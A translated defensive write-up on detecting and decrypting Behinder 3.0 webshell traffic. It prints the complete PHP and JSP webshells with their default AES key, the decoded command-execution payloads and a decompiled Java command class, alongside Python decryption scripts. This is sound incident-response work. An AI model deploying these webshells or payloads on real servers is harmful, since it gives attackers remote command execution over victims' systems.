
Behinder (冰蝎) 3.0 Traffic Analysis and Reconstruction

I hope this article can genuinely help organizations that have been compromised with identification and attack tracing.

PHP shell

Unlike Behinder 2.0, which generated a random AES key when the connection was established and exchanged it in plaintext, Behinder 3.0 uses as its AES key the first 16 characters of the 32-character MD5 hash of the connection password; the default connection password is rebeyond. This gives fully encrypted transmission, but the traffic still has some identifiable characteristics.

Characteristics: the connection's Content-Length is 5464 or 5484 (5484 being the more common of the two), and the body is AES-encrypted and base64-encoded. To decrypt it, obtain the key by capturing the contents of shell.php; the specific steps are shown below.

The Behinder 3.0 webshell is as follows:

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; // the key is the first 16 characters of the 32-character MD5 of the connection password; default password rebeyond
    $_SESSION['k']=$key;
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");

        for($i=0;$i<strlen($post);$i++) {
            $post[$i] = $post[$i]^$key[$i+1&15];
        }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

The captured traffic is shown in the figure below:

Start reconstructing the traffic. At this stage of the incident response, first obtain the webshell file and extract the key from it (the first 16 characters of the 32-character MD5 of the connection password) to use as the AES decryption key. Decrypting the request body gives:

assert|eval(base64_decode('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'));

Then base64-decode the data inside it; the content is as follows:

@error_reporting(0);

function getSafeStr($str){
    $s1 = iconv('utf-8','gbk//IGNORE',$str);
    $s0 = iconv('gbk','utf-8//IGNORE',$s1);
    if($s0 == $str){
        return $s0;
    }else{
        return iconv('gbk','utf-8//IGNORE',$str);
    }
}
function main($cmd)
{
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time', 0);
    $result = array();
    $PadtJn = @ini_get('disable_functions');
    if (! empty($PadtJn)) {
        $PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);
        $PadtJn = explode(',', $PadtJn);
        $PadtJn = array_map('trim', $PadtJn);
    } else {
        $PadtJn = array();
    }
    $c = $cmd;
    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {
        $c = $c . " 2>&1\n";
    }
    $JueQDBH = 'is_callable';
    $Bvce = 'in_array';
    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {
        ob_start();
        system($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {
        $handle = proc_open($c, array(
            array(
                'pipe',
                'r'
            ),
            array(
                'pipe',
                'w'
            ),
            array(
                'pipe',
                'w'
            )
        ), $pipes);
        $kWJW = NULL;
        while (! feof($pipes[1])) {
            $kWJW .= fread($pipes[1], 1024);
        }
        @proc_close($handle);
    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {
        ob_start();
        passthru($c);
        $kWJW = ob_get_contents();
        ob_end_clean();
    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {
        $kWJW = shell_exec($c);
    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {
        $kWJW = array();
        exec($c, $kWJW);
        $kWJW = join(chr(10), $kWJW) . chr(10);
    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {
        $fp = popen($c, 'r');
        $kWJW = NULL;
        if (is_resource($fp)) {
            while (! feof($fp)) {
                $kWJW .= fread($fp, 1024);
            }
        }
        @pclose($fp);
    } else {
        $kWJW = 0;
        $result["status"] = base64_encode("fail");
        $result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");
        $key = $_SESSION['k'];
        echo encrypt(json_encode($result), $key);
        return;
        
    }
    $result["status"] = base64_encode("success");
    $result["msg"] = base64_encode(getSafeStr($kWJW));
    echo encrypt(json_encode($result),  $_SESSION['k']);
}

function encrypt($data,$key)
{
    if(!extension_loaded('openssl'))
    {
        for($i=0;$i<strlen($data);$i++) {
            $data[$i] = $data[$i]^$key[$i+1&15];
        }
        return $data;
    }
    else
    {
        return openssl_encrypt($data, "AES128", $key);
    }
}
$cmd="ls";
main($cmd);

We can see that the request executed the ls command.

The response content is decrypted in the same way.

Attached is the decryption script from fellow researchers on GitHub; it currently supports PHP only: https://github.com/melody27/behinder_decrypt
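As an added example (not code from the article or from Behinder), the following Python reproduces the PHP shell's two decryption paths in one place: key derivation from the connection password, the XOR fallback the shell uses when the openssl extension is missing, and the openssl path, where openssl_decrypt($post, "AES128", $key) resolves to AES-128-CBC with a zero IV rather than the ECB mode of the JSP shell. Function names and the sample request body are constructed for this example; pycryptodome is assumed only for the AES path.

```python
import base64
import hashlib

try:
    from Crypto.Cipher import AES  # pycryptodome, the library the article's own script uses
except ImportError:                # the XOR fallback path below needs only the standard library
    AES = None

ZERO_IV = bytes(16)  # openssl_decrypt() with an empty $iv pads it to 16 zero bytes

def derive_key(password: str) -> str:
    # Behinder 3.0 key: first 16 hex characters of md5(connection password)
    return hashlib.md5(password.encode()).hexdigest()[:16]

def xor_transform(data: bytes, key: str) -> bytes:
    # The shell's no-openssl path: $post[$i] ^ $key[$i+1&15], i.e. key[(i+1) & 15]; symmetric
    k = key.encode()
    return bytes(b ^ k[(i + 1) & 15] for i, b in enumerate(data))

def openssl_available() -> bool:
    return AES is not None

def decrypt_php_body(body: str, key: str, use_openssl: bool = True) -> bytes:
    # Reverse what the shell does to php://input. With openssl loaded it calls
    # openssl_decrypt($post, "AES128", $key): OpenSSL resolves "AES128" to aes-128-cbc,
    # so this is CBC with a zero IV and PKCS#7 padding, not the ECB mode the JSP shell uses.
    raw = base64.b64decode(body)
    if not use_openssl:
        return xor_transform(raw, key)
    plain = AES.new(key.encode(), AES.MODE_CBC, iv=ZERO_IV).decrypt(raw)
    return plain[:-plain[-1]]

def decode_eval_payload(plain: bytes):
    # Split 'func|params' as the shell's explode('|') does, then recover the script
    # carried inside eval(base64_decode('...'))
    func, _, params = plain.partition(b"|")
    start = params.index(b"base64_decode('") + len(b"base64_decode('")
    return func.decode(), base64.b64decode(params[start:params.index(b"'", start)])

def build_sample_request(key: str, use_openssl: bool = True) -> str:
    # Constructed sample body (not captured traffic), shaped like the article's decrypted
    # request: assert|eval(base64_decode('<script>'));
    script = b'echo "constructed sample";'
    plain = b"assert|eval(base64_decode('" + base64.b64encode(script) + b"'));"
    if not use_openssl:
        return base64.b64encode(xor_transform(plain, key)).decode()
    pad = 16 - len(plain) % 16  # PKCS#7, which openssl_encrypt() also applies on the response side
    cipher = AES.new(key.encode(), AES.MODE_CBC, iv=ZERO_IV)
    return base64.b64encode(cipher.encrypt(plain + bytes([pad]) * pad)).decode()
```

The response body is handled the same way, since encrypt() in the decoded payload mirrors the shell's two branches.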

JSP shell

The JSP webshell is not very complex either; here it is first:

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!
class U extends ClassLoader {
    U(ClassLoader c) { super(c); }
    public Class g(byte[] b) { return super.defineClass(b, 0, b.length); }
}
%>
<%
if (request.getMethod().equals("POST")) {
    String k = "e45e329feb5d925b"; /* the key is the first 16 characters of the 32-character MD5 of the connection password; default password rebeyond */
    session.putValue("u", k);
    Cipher c = Cipher.getInstance("AES");
    c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
    new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);
}
%>

Again, first obtain the webshell file and extract the key from it (the first 16 characters of the 32-character MD5 of the connection password) to use as the AES decryption key.

Request decryption code:

# coding: utf-8
# Note: on Python 3 the Crypto package is installed with
#   pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple pycryptodome
import base64
from Crypto.Cipher import AES


# Decrypt: the JSP shell's Cipher.getInstance("AES") is AES/ECB/PKCS5Padding
def aes_decode(data, key):
    aes = AES.new(str.encode(key), AES.MODE_ECB)  # initialise the cipher
    decrypted_text = aes.decrypt(data)            # decrypt
    return decrypted_text[:-decrypted_text[-1]]   # strip the PKCS#5 padding


if __name__ == '__main__':
    key = 'e45e329feb5d925b'  # key length must be 16, 24 or 32 bytes, for AES-128, AES-192 and AES-256 respectively
    data = "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"
    data = base64.b64decode(data)

    a = aes_decode(data, key)
    with open('3.class', 'wb') as f:  # write the decrypted class file out for decompilation
        f.write(a)

Finally, decompile the resulting class file.

The decompiled code that gets executed is as follows:


package net.rebeyond.behinder.payload.java;

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.nio.charset.Charset;
import java.util.HashMap;
import java.util.Map;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.ServletOutputStream;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpSession;
import javax.servlet.jsp.PageContext;

public class Cmd {
    public static String cmd = "pwd";
    private ServletRequest Request;
    private ServletResponse Response;
    private HttpSession Session;

    public boolean equals(Object obj) {
        PageContext page = (PageContext) obj;
        this.Session = page.getSession();
        this.Response = page.getResponse();
        this.Request = page.getRequest();
        page.getResponse().setCharacterEncoding("UTF-8");
        Map<String, String> result = new HashMap<>();
        try {
            result.put("msg", RunCMD(cmd));
            result.put("status", "success");
            try {
            } catch (Exception e) {
                e.printStackTrace();
            }
        } catch (Exception e2) {
            result.put("msg", e2.getMessage());
            result.put("status", "success");
            try {
            } catch (Exception e3) {
                e3.printStackTrace();
            }
        } finally {
            try {
                ServletOutputStream so = this.Response.getOutputStream();
                so.write(Encrypt(buildJson(result, true).getBytes("UTF-8")));
                so.flush();
                so.close();
                page.getOut().clear();
            } catch (Exception e4) {
                e4.printStackTrace();
            }
        }
        return true;
    }

    private String RunCMD(String cmd2) throws Exception {
        Process p;
        Charset osCharset = Charset.forName(System.getProperty("sun.jnu.encoding"));
        String result = "";
        if (cmd2 == null || cmd2.length() <= 0) {
            return result;
        }
        if (System.getProperty("os.name").toLowerCase().indexOf("windows") >= 0) {
            p = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", cmd2});
        } else {
            p = Runtime.getRuntime().exec(cmd2);
        }
        BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream(), "GB2312"));
        String disr = br.readLine();
        String result2 = result;
        while (disr != null) {
            String result3 = result2 + disr + "\n";
            disr = br.readLine();
            result2 = result3;
        }
        return new String(result2.getBytes(osCharset));
    }

    private byte[] Encrypt(byte[] bs) throws Exception {
        SecretKeySpec skeySpec = new SecretKeySpec(this.Session.getAttribute("u").toString().getBytes("utf-8"), "AES");
        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
        cipher.init(1, skeySpec);
        return cipher.doFinal(bs);
    }

    private String buildJson(Map<String, String> entity, boolean encode) throws Exception {
        StringBuilder sb = new StringBuilder();
        String version = System.getProperty("java.version");
        sb.append("{");
        for (String key : entity.keySet()) {
            sb.append("\"" + key + "\":\"");
            String value = ((String) entity.get(key)).toString();
            if (encode) {
                if (version.compareTo("1.9") >= 0) {
                    getClass();
                    Class Base64 = Class.forName("java.util.Base64");
                    Object Encoder = Base64.getMethod("getEncoder", null).invoke(Base64, null);
                    value = (String) Encoder.getClass().getMethod("encodeToString", new Class[]{byte[].class}).invoke(Encoder, new Object[]{value.getBytes("UTF-8")});
                } else {
                    getClass();
                    Object Encoder2 = Class.forName("sun.misc.BASE64Encoder").newInstance();
                    value = ((String) Encoder2.getClass().getMethod("encode", new Class[]{byte[].class}).invoke(Encoder2, new Object[]{value.getBytes("UTF-8")})).replace("\n", "").replace("\r", "");
                }
            }
            sb.append(value);
            sb.append("\",");
        }
        if (sb.toString().endsWith(",")) {
            sb.setLength(sb.length() - 1);
        }
        sb.append("}");
        return sb.toString();
    }
}

The reconstructed request content; here it is pwd.

We can see that the result of pwd was successfully decrypted.

Summary: when you encounter Behinder 3, do not panic. Find out when the webshell was deployed and which vulnerability was used to get in, locate where the webshell is stored, trace back through full-packet capture, and work out what the attacker did afterwards.

This article analyzes things from the defender's perspective of traffic identification. It does not cover User-Agent based identification, since Behinder can modify those request headers at will.

Follow-up articles will cover Godzilla and memory-resident webshells (内存马), the identification and extraction of their traffic signatures, and then help with writing custom WAF detection rules.


This article was shared from the WeChat official account 黑伞攻防实验室 (hack_umbrella); author: 马努.


Originally published: 2020-11-24
